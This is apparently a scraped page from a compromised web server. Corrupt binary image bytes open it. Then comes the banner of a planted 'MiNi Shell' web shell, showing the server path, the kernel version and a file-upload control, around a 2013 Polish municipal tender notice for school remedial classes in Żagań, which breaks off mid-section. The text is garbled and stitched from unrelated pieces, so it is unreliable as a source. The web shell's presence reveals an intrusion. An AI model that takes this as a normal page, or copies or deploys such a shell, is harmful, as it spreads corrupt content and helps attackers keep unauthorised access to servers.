JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130926/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130926/390684-N-2013.html

<p class="kh_header"><b>Żagań: Wyrównywanie szans edukacyjnych i rozwój kompetencji kluczowych u uczniów PSP 1 i PSP 2 w Żaganiu</b><br>
<b>Numer ogłoszenia: 390684 - 2013; data zamieszczenia: 26.09.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Żagań o Statusie Miejskim , Plac Słowiański 17, 68-100 Żagań, woj. lubuskie, tel. 68 4771040, faks 68 4771017.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.zagan.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wyrównywanie szans edukacyjnych i rozwój kompetencji kluczowych u uczniów PSP 1 i PSP 2 w Żaganiu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Projekt obejmuje 4 narzędzia realizacji programów rozwojowych :
- zajęcia dydaktyczno - wyrównawcze ( matematyka, język polski, język angielski)
- dodatkowe zajęcia pozalekcyjne rozwijające kompetencje kluczowe, 
- doradztwo i opieka pedagogiczno-psychologiczna,
- wdrożenie innowacyjnych form nauczania i oceniania cechujących się wyższą    
  skutecznością niż formy tradycyjne.
Wsparciem zostanie objętych 150 uczniów klas IV, V i VI ze szkół podstawowych nr 1 i 2  w Żaganiu (podział uczniów na szkoły : PSP 1- 75 uczniów, PSP 2- 75 uczniów, w ramach : 
- zajęć wyrównawczych - 90 uczniów ( 45 uczniów z PSP 1 i 45 uczniów z PSP 2)       
- zajęć rozwijających (akademia) - 60 uczniów ( 30 uczniów z PSP 1 i 30 uczniów z PSP 2) 
w tym:
- w ramach zajęć terapeutycznych dla uczniów niepełnoprawnych - 20 uczniów ( 10 uczniów z PSP 1 i 10 uczniów PSP 2) 
- w ramach warsztatów psychologiczno-pedagogicznych - 40 uczniów (20 uczniów z  PSP 1 i 20 uczniów z PSP 2) 
- w ramach Dziecięcej Akademii Przedsiębiorczości - 20 uczniów ( 10 uczniów z PSP 1  i 10 uczniów z PSP 2). 

Zakres merytoryczny projektu  obejmuje następujące zadania : 
Zadanie 1 : Zajęcia dydaktyczno-wyrównywacze - zajęcia kompensujące braki rozwojowe uczniów   klas IV, V, VI PSP 1 realizowane w grupach, dostosowanych do specyficznych potrzeb uczniów : 
- z  matematyki ( 3 grupy )- częstotliwość zajęć -1 raz w tygodniu dla 1 grupy 
- z języka polskiego ( 3 grupy) - częstotliwość zajęć - 1 raz w tygodniu dla 1 grupy 
- z języka angielskiego ( 3 grupy) - częstotliwość zajęć - 1 raz w tygodniu dla 1 grupy. 
Cele zadania : 
-  wyrównywanie i usystematyzowanie wiedzy i umiejętności 45 uczniów PSP 1 zagrożonych  niepowodzeniem po przekroczeniu progu edukacyjnego oraz przeciwdziałanie  przedwczesnemu wypadnięciu z systemu oświaty ( w tym rozwój kompetencji kluczowych:  między innymi porozumiewania się w języku ojczystym, w języku obcym, kompetencje  matematyczne i informatyczne, umiejętność uczenia się). Weryfikacja- diagnoza-prace  kontrolne ex-ante i ex-post, dziennik zajęć. 
- opracowanie i wdrożenie nowe formy nauczania, skuteczniejszej niż stosowane formy tradycyjne.  Weryfikacja- sprawozdanie w formie pisemnej. 
Zadanie 2: Dodatkowe zajęcia pozalekcyjne ukierunkowane na rozwój zainteresowań i umiejętności uczniów klas IV, V i VI PSP1 w grupach, dostosowanych do specyficznych potrzeb uczniów: 
- z  akademii matematycznej ( 3 grupy)- częstotliwość zajęć - 2 razy w tygodniu dla 1 grupy, 
- z  akademii przyrodniczej (3 grupy)- częstotliwość zajęć- 2 razy w tygodniu dla 1 grupy, 
- z akademii  języka angielskiego (3 grupy)- częstotliwość zajęć - 1 raz w tygodniu dla 1 grupy.
Cele zadania: 
- wsparcie rozwoju zainteresowań i umiejętności 30 zdolnych uczniów PSP1 z zakresu
matematyki, przyrody i języka angielskiego z zastosowaniem ICT oraz zwiększenie ich szans edukacyjnych i życiowych (w tym rozwój kompetencji kluczowych między innymi  porozumiewanie się w języku obcym, kompetencje matematyczne i informatyczne, umiejętność uczenia się). Weryfikacja- diagnoza - prace kontrolne ex-ante i ex-post, dziennik zajęć.  
- opracowanie i wdrożenie nowej formy nauczania, skuteczniejszej niż stosowane formy  tradycyjne. Weryfikacja - sprawozdanie w formie pisemnej.
Zadanie 3 : 
Zajęcia terapeutyczne dla uczniów klas IV, V. VI PSP 1 z orzeczeniem o niepełnosprawności (objętych zajęciami w ramach zadania 1 i 2 ) w 2 grupach, dostosowanych do specyficznych potrzeb uczniów. Częstotliwość zajęć: 1 raz w tygodniu. 
Cele zadania : 
- wsparcie edukacji integracyjnej 10uczniów niepełnosprawnych PSP 1 oraz ich wzmocnienie w środowisku szkolnym, w szczególności rozwój kompetencji kluczowych, w tym kompetencji społecznych i obywatelskich, świadomości i ekspresji kulturalnej.   Weryfikacja - diagnoza- prace kontrolne ex-ante i ex-post, dziennik zajęć, 
- wypracowanie systemu pracy z uczniem o specjalnych potrzebach edukacyjnych. Weryfikacja- dokument przygotowany w formie pisemnej. 
Zadanie 4 : Warsztat psychologiczno-pedagogiczne- terapia dla uczniów klas IV,V,VI PSP 1 o specyficznych problemach dotyczących funkcjonowania w społeczności, z problemami adaptacyjnymi (objętych zajęciami w ramach zadania 1 i 2 ) w 2 grupach, dostosowanych do specyficznych potrzeb uczniów. Częstotliwość zajęć : 1 raz w tygodniu. 
Cele zadania : 
- eliminacja dysproporcji rozwojowych u 20 uczniów PSP1 dotkniętych dysfunkcjami psycho - fizycznymi i środowiskowymi (uwzględniając rozwój kompetencji kluczowych, w tym kompetencji społecznych i obywatelskich, świadomości i ekspresji kulturalnej). Weryfikacja - diagnoza- prace kontrolne  ex-ante i ex-post, dziennik zajęć, 
- opracowanie i wdrożenie nowej formy nauczania, skuteczniejszej niż stosowane formy  tradycyjne. Weryfikacja - sprawozdanie w formie pisemnej. 
Zadanie 5 : Dziecięca Akademia Przedsiębiorczości - klasy IV,V,VI PSP 1 (objętych zajęciami w ramach zadania 1 i 2) w  1 grupie, dostosowanych do specyficznych potrzeb uczniów. Częstotliwość zajęć : 1 raz w tygodniu. 
Cele zadania : 
- wzrost u 10 uczniów PSP1 zdolności do świadomego i efektywnego planowania ścieżki rozwoju i wejścia w przyszłości na lokalny rynek pracy. Zajęcia maja na celu wskazanie uczniom korzyści płynących z bycia aktywnym i umiejętności eksponowania swojej wiedzy i zalet na zewnątrz w kontekście późniejszego wejścia na rynek pracy. Zajęcia powinny być przeprowadzone jako zajęcia warsztatowe z zastosowaniem metod aktywizujących. Zajęcia maja ukształtować przedsiębiorcze postawy uczniów, takie jak : wiara we własne możliwości, wytrwałość w dążeniu do celu, odpowiedzialność za podejmowanie decyzji, uczenie się na błędach, podejmowanie z własnej inicjatywy działań. Weryfikacja- diagnoza- prace kontrolne ex-ante i ex-post, dziennik zajęć; 
- opracowanie i wdrożenie nowej formy nauczania, skuteczniejszej niż stosowane formy tradycyjne. Weryfikacja- sprawozdanie w formie pisemnej. 
Zadanie 6 : Zajęcia dydaktyczno - wyrównawcze - zajęcia kompensujące braki rozwojowe uczniów klas IV,V,VI PSP 2 realizowane w grupach, dostosowanych do specyficznych potrzeb uczniów:  
- z  matematyki (3 grupy)- częstotliwość zajęć- 1 raz w tygodniu dla 1 grupy,
- z języka polskiego (3 grupy)- częstotliwość zajęć- 1 raz w tygodniu dla 1 grupy, 
- z języka angielskiego (3 grupy)- częstotliwość zajęć- 1 raz w tygodniu dla 1 grupy. 
Cele zadania: 
- wyrównanie i usystematyzowanie wiedzy i umiejętności 45 uczniów PSP 2 zagrożonych   niepowodzeniem po przekroczeniu progu edukacyjnego oraz przeciwdziałanie przedwczesnemu wypadnięciu z systemu oświaty (w tym rozwój kompetencji kluczowych: między innymi porozumiewanie się w języku ojczystym, w języku obcym, kompetencje matematyczne i informatyczne, umiejętność uczenia się). Weryfikacja- diagnoza- prace kontrolne ex-ante i ez-post, dziennik zajęć;
- opracowanie i wdrożenie nowej formy nauczania, skuteczniejszej niż stosowane formy tradycyjne. Weryfikacja - sprawozdanie w formie pisemnej. 
Zadanie 7 : Dodatkowe zajęcia pozalekcyjne ukierunkowane na rozwój zainteresowań i umiejętności uczniów klas IV,V,VI PSP 2 w grupach, dostosowanych do specyficznych potrzeb uczniów : 
- z akademii matematycznej (3 grupy) - częstotliwość zajęć - 2 razy w tygodniu dla 1 grupy,  
- z  akademii przyrodniczej (3 grupy)- częstotliwość zajęć- 2 razy w tygodniu dla 1 grupy, 
- z akademii  języka angielskiego (3 grupy)- częstotliwość zajęć - 1 raz w tygodniu dla 1 grupy.
Cele zadania: 
- wsparcie rozwoju zainteresowań i umiejętności 30 zdolnych uczniów PSP 2 z zakresu
   matematyki, przyrody i języka angielskiego z zastosowaniem ICT oraz zwiększenie ich   szans edukacyjnych i życiowych (w tym rozwój kompetencji kluczowych między innymi    porozumiewanie się w języku obcym, kompetencje matematyczne i informatyczne, umiejętność uczenia się). Weryfikacja- diagnoza - prace kontrolne ex-ante i ex-post, dziennik zajęć,  
- opracowanie i wdrożenie nowej formy nauczania, skuteczniejszej niż stosowane formy tradycyjne.  Weryfikacja - sprawozdanie w formie pisemnej.
Zadanie 8 : Zajęcia terapeutyczne dla uczniów klas IV, V. VI PSP 2 z orzeczeniem o niepełnosprawności (objętych zajęciami w ramach zadania 1 i 2 ) w 2 grupach, dostosowanych do specyficznych potrzeb uczniów. Częstotliwość zajęć: 1 raz w tygodniu. 
Cele zadania : 
- wsparcie edukacji integracyjnej 10uczniów niepełnosprawnych PSP 2 oraz ich wzmocnienie w środowisku szkolnym, w szczególności rozwój kompetencji kluczowych, w tym kompetencji społecznych i obywatelskich, świadomości i ekspresji kulturalnej.  Weryfikacja - diagnoza- prace kontrolne ex-ante i ex-post, dziennik zajęć, 
- wypracowanie systemu pracy z uczniem o specjalnych potrzebach edukacyjnych Weryfikacja- dokument przygotowany w formie pisemnej. 
Zadanie 9 : Warsztat psychologiczno-pedagogiczne- terapia dla uczniów klas IV,V,VI PSP 2 o specyficznych problemach dotyczących funkcjonowania w społeczności, z problemami adaptacyjnymi (objętych zajęciami w ramach zadania 1 i 2 ) w 2 grupach, dostosowanych do specyficznych potrzeb uczniów. Częstotliwość zajęć : 1 raz w tygodniu. 
Cele zadania : 
- eliminacja dysproporcji rozwojowych u 20 uczniów PSP2 dotkniętych dysfunkcjami psycho - fizycznymi i środowiskowymi (uwzględniając rozwój kompetencji kluczowych, w tym kompetencji społecznych i obywatelskich, świadomości i ekspresji kulturalnej). Weryfikacja - diagnoza- prace kontrolne  ex-ante i ex-post, dziennik zajęć, 
- opracowanie i wdrożenie nowej formy nauczania, skuteczniejszej niż stosowane formy  tradycyjne. Weryfikacja - sprawozdanie w formie pisemnej. 
Zadanie 10 :  Dziecięca Akademia Przedsiębiorczości - klasy IV,V,VI PSP 2 (objętych zajęciami w ramach zadania 1 i 2) w  1 grupie, dostosowanych do specyficznych potrzeb uczniów. Częstotliwość zajęć : 1 raz w tygodniu. 
Cele zadania : 
- wzrost u 10 uczniów PSP 2 zdolności do świadomego i efektywnego planowania ścieżki rozwoju i wejścia w przyszłości na lokalny rynek pracy. Zajęcia maja na celu wskazanie uczniom korzyści płynących z bycia aktywnym i umiejętności eksponowania swojej wiedzy i zalet na zewnątrz w kontekście późniejszego wejścia na rynek pracy. 
- Zajęcia powinny być przeprowadzone jako zajęcia warsztatowe z zastosowaniem metod aktywizujących. Zajęcia maja ukształtować przedsiębiorcze postawy uczniów, takie jak : wiara we własne możliwości, wytrwałość w dążeniu do celu, odpowiedzialność za podejmowanie decyzji, uczenie się na błędach, podejmowanie z własnej inicjatywy działań. Weryfikacja- diagnoza- prace kontrolne ex-ante i ex-post, dziennik zajęć.
- opracowanie i wdrożenie nowej formy nauczania, skuteczniejszej niż stosowane formy tradycyjne. Weryfikacja- sprawozdanie w formie pisemnej. 

2.2. Dodatkowe informacje do opisu przedmiotu zamówienia : 
Czas trwania zajęć oraz liczebność grup musi być zgodna z treścią rozporządzenia Ministra Edukacji Narodowej z dnia 17 listopada 2010 r. w sprawie zasad udzielania i organizacji pomocy psychologiczno-pedagogicznej w publicznych przedszkolach, szkołach i placówkach.  
Zestawienie godzin  na poszczególne rodzaje zajęć oraz harmonogram - w załączniku nr 1.

Podstawowe obowiązki Wykonawcy : 
1) przygotowanie w terminie 5 dni od daty podpisania umowy szczegółowego programu  zajęć ukierunkowanego na realizację celu głównego i założeń projektu oraz 
harmonogramu realizacji zajęć zgodnego z harmonogramem Projektu i uzyskanie  zatwierdzenia przygotowanych dokumentów przez Kierownika Projektu, przy czym:
a)program i harmonogram stanowią podstawę wykonania umowy i integralną jej część   jako załączniki, 
b)program zajęć uwzględnia zdiagnozowane potrzeby  edukacyjne uczniów oraz  przewiduje wykorzystanie form, metod i środków odpowiednich dla uczestników,
c)  program uwzględnia opracowanie i wdrożenie nowej formy nauczania, skuteczniejszej   niż stosowane formy tradycyjne.  Rozliczenie z wprowadzenia nowej formy nauczania  nastąpi  na zakończenie realizacji zajęć poprzez złożenie stosowanego raportu.
d) harmonogram zajęć pozalekcyjnych dostosowany jest do tygodniowego rozkładu zajęć   uczestników projektu, tak aby zajęcia nie kolidowały z zajęciami wynikającymi z  obowiązku szkolnego; 
2) prowadzenie zajęć pozalekcyjnych zgodnie z opracowanym programem i harmonogramem, o którym mowa w podpunkcie 1 oraz osiągnięcie celów, przypisanych    do rodzaju zajęć i zadania, określonych w punkcie 2.1. dot. zakresu merytorycznego projektu;  
3) informowanie odbiorców usług edukacyjnych i Kierownika Projektu o wszelkich zmianach w harmonogramie w terminie nie późniejszym niż 3 dni przed realizowaną zmianą i  uzyskanie zgody Kierownika na proponowaną zmianę. Termin może być krótszy niż 3 dni w sytuacji, gdy zachowanie tego terminu jest obiektywnie niemożliwe; 
4) korzystanie z materiałów dydaktycznych i eksploatacyjnych przekazanych uczestnikom  projektu;
5) przeprowadzenie zgodnie z zaleceniami Zamawiającego pomiaru umiejętności i wiedzy uczestników projektu polegającego na wykonaniu prac kontrolnych na początku (ex-ante) i  na końcu (ex-post) realizacji projektu i przygotowanie raportu wskazującego na efekty prowadzonych zajęć;
6) prowadzenie ewidencji godzin (zajęć) realizowanych w ramach projektu oraz  
systematyczne i prawidłowe dokumentowanie usługi edukacyjnej (karty czasu pracy,  dziennik zajęć, dokumentacja fotograficzna, materiały potwierdzające wykonanie zadań przez uczestników);
7) udostępnienie Zamawiającemu wszystkich dokumentów związanych z realizowanym zadaniem w celu kontroli prawidłowości realizacji przedmiotu umowy;
8) przestrzeganie przepisów ustawy z dnia 29 sierpnia 1997r o ochronie danych osobowych (Dz. U. z 2002r, Nr 101, poz. 926 z późn. zm) oraz rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 29 kwietnia 2004r w sprawie dokumentacji  przetwarzania danych osobowych oraz warunków technicznych i organizacyjnych jakim  powinny odpowiadać urządzenia i systemy informatyczne służące do przetwarzania danych osobowych ( Dz. U. Nr 100, poz. 1024);
9) wykonanie przedmiotu umowy zgodnie z wymogami zawartymi w Specyfikacji Istotnych Warunków Zamówienia;
10)zachowanie należytej staranności przy wykonywaniu przedmiotu umowy z  uwzględnieniem zawodowego charakteru prowadzonej działalności. W razie stwierdzenia uchybień w należytym wykonywaniu przedmiotu zamówienia Zamawiający zastrzega  możliwość rozwiązania umowy w trybie natychmiastowym;
11)zgłaszanie Zamawiającemu wszelkich okolicznościach, które pojawiły się przy  wykonywaniu umowy, mających wpływ na prawidłowy przebieg realizacji umowy; 
12)monitorowanie frekwencji uczestników zajęć i przełożenia zajęć na inny termin w sytuacji  frekwencji poniżej 50%, informując jednocześnie o tym fakcie Koordynatora projektu: 
13) Wykonawca zobowiązuje się do oznaczenia:
- pomieszczenia, w którym realizowane są zajęcia dydaktyczne; 
- dzienników zajęć, 
 zgodnie z aktualnymi wytycznym dotyczącymi oznaczania projektów w ramach Programu   Operacyjnego Kapitał Ludzki; 
14)Wykonawca zobowiązany jest do informowania uczestników zajęć oraz podmiotów 
trzecich współpracujących przy organizacji zajęć oraz publiczności o współfinansowaniu  projektu ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego,  informowania instytucji współpracujących i społeczeństwa o fakcie współfinansowania  projektu z Europejskiego Funduszu Społecznego i osiągniętych rezultatach projektu.  
15)Wykonawca jest zobowiązany wykonywać swoje zobowiązanie z należytą starannością;
16)usługa winna być wykonywana zgodnie z aktualną wiedzą w danej dziedzinie;  
17)Wykonawca jest zobowiązany do współpracy z Zamawiającym, w szczególności do informowania Zamawiającego o wszelkich przeszkodach czy utrudnieniach w prawidłowej  realizacji świadczeń i wypracowywania sposobów alternatywnego i zgodnego z  oczekiwaniami Zamawiającego sposobu realizacji świadczenia; 
18)Wykonawca ponosi odpowiedzialność na zasadach ogólnych za szkody wyrządzone  przez niego bądź wynikłe z winy w nadzorze wobec odbiorców usług edukacyjnych;
19)Wykonawca odpowiada za naruszenie autorskich praw majątkowych i dóbr osobistych  osób trzecich, odnoszących się do przedmiotu umowy oraz oświadcza, że wszystkie  wyniki prac mogące stanowić przedmiot praw autorskich, w tym w szczególności wzór ankiety, materiały szkoleniowe, prezentacje będą oryginalne, bez niedozwolonych  zapożyczeń z utworów osób trzecich, a także nie będą naruszać autorskich praw  majątkowych i dóbr osobistych osób trzecich;  
20)Wykonawca będzie wykorzystywał cudze utwory jedynie w ramach dozwolonego użytku  zgodnie z art. 29 ustawy o prawie autorskim i prawach pokrewnych z dnia 4 lutego 1994 r. (Dz. U. Nr 24, poz. 83);  
21)Wykonawca przenosi na Zamawiającego, z chwilą przekazania opracowań w ramach  wynagrodzenia określonego w umowie całość praw autorskich majątkowych do ww.  dokumentów będących utworami w rozumieniu przepisów ustawy z dnia 4 lutego 1994 r. o prawie autorskim i prawach pokrewnych (Dz. U. z 2006r., Nr 90 poz. 631 z poźn. zm.),  powstałych w celu realizacji zadania opisanego w § 1, obejmujących prawo jej  eksploatacji na następujących polach: 
a)	utrwalanie i zwielokrotnianie egzemplarzy utworu określoną dostępną techniką, w tym  techniką drukarską, reprograficzną, zapisu magnetycznego oraz techniką cyfrową; 
b)	wprowadzanie do obrotu, użyczanie lub najem oryginału utworu albo jego egzemplarzy; 
c)	publiczne rozpowszechnianie utworu, jego wystawianie, wyświetlanie, odtwarzanie, nadawanie a także publiczne udostępnianie utworu w taki sposób, aby każdy mógł mieć do niego dostęp w miejscu i w czasie przez siebie wybranym;  
Przeniesienie całości autorskich praw majątkowych powoduje również przeniesienie na  Zamawiającego własności egzemplarzy dokumentów, o których mowa wyżej; 
22)Wykonawca ponosi pełną odpowiedzialność za właściwe wykonanie przedmiotu umowy  w okresie jej trwania oraz pełną odpowiedzialność odszkodowawczą za szkody powstałe  na skutek niewykonania przedmiotu umowy. 
23)W przypadku powstania jakiejkolwiek szkody na skutek niewykonania lub uchybień  w wykonaniu przedmiotu umowy Wykonawca obowiązany jest do pokrycia całej powstałej     szkody.
24)Ponadto  Wykonawca ponosi odpowiedzialność za:
1)	bezpieczeństwo uczniów w czasie trwania zajęć;
2)	jakość i terminowość prowadzonych zajęć;
3)	wykorzystanie sprzętu i materiałów dydaktycznych zakupionych w ramach projektu zgodnie  z ich przeznaczeniem do realizacji zajęć pozalekcyjnych oraz dbałość o ich należyty stan. 
4)	osiągniecie określonych wskaźników realizacji projektu..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 18.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda od wykonawcy wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia publicznego mogą ubiegać się - na podstawie art. 22 ust.1  ustawy Prawo zamówień publicznych - wykonawcy, którzy spełniają warunki, dotyczące: 
- posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania,  - posiadania wiedzy i doświadczenia, - dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do  wykonania zamówienia,  -  sytuacji ekonomicznej i finansowej,   i w tym zakresie, zgodnie z art. 44 ustawy Prawo zamówień publicznych, Zamawiający żąda : 
1) złożenia stosownego oświadczenia o spełnieniu warunków udziału w postępowaniu Wykonawcy występujący wspólnie  powyższy warunek mogą spełnić łącznie ; 
2)  w  zakresie  posiadania  przez Wykonawcę uprawnień do wykonywania określonej działalności lub czynności, Zamawiający  nie precyzuje szczególnych  wymagań, których  spełnienie Wykonawca zobowiązany będzie wykazać; 

Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (np. w formie 
Konsorcjum). W przypadku wspólnego ubiegania się, Wykonawcy ustanawiają pełnomocnika  do reprezentowania ich w postępowaniu o udzielenie  zamówienia  publicznego albo do reprezentowania w postępowaniu i  zawarcia  umowy w  sprawie  zamówienia publicznego.  Na potwierdzenie ustanowienia pełnomocnika Wykonawcy załączają do oferty stosowne  pełnomocnictwo.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>3) w zakresie  posiadania wiedzy i doświadczenia Zamawiający  nie precyzuje  wymagań, których spełnienie  Wykonawca zobowiązany będzie wykazać;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>4) w zakresie dysponowania odpowiednimi osobami zdolnymi do wykonania zamówienia,  Zamawiający  wymaga aby Wykonawca dysponował  co najmniej 1 osobą (lub osobami)  posiadającą 3 letnie doświadczenie pedagogiczne w pracy w szkole (w rozumieniu   przepisów Rozporządzenia Ministra Edukacji Narodowej z dnia 12 marca 2009 r. w  sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i  wypadków, w których można zatrudniać nauczycieli nie mających wyższego  wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz. U. Nr 50 poz. 400)  oraz posiadającą odpowiednie kwalifikacje wymagane  dla danej części zamówienia.    
Zamawiający wymaga aby Wykonawca posiadał następujące kwalifikacje : 
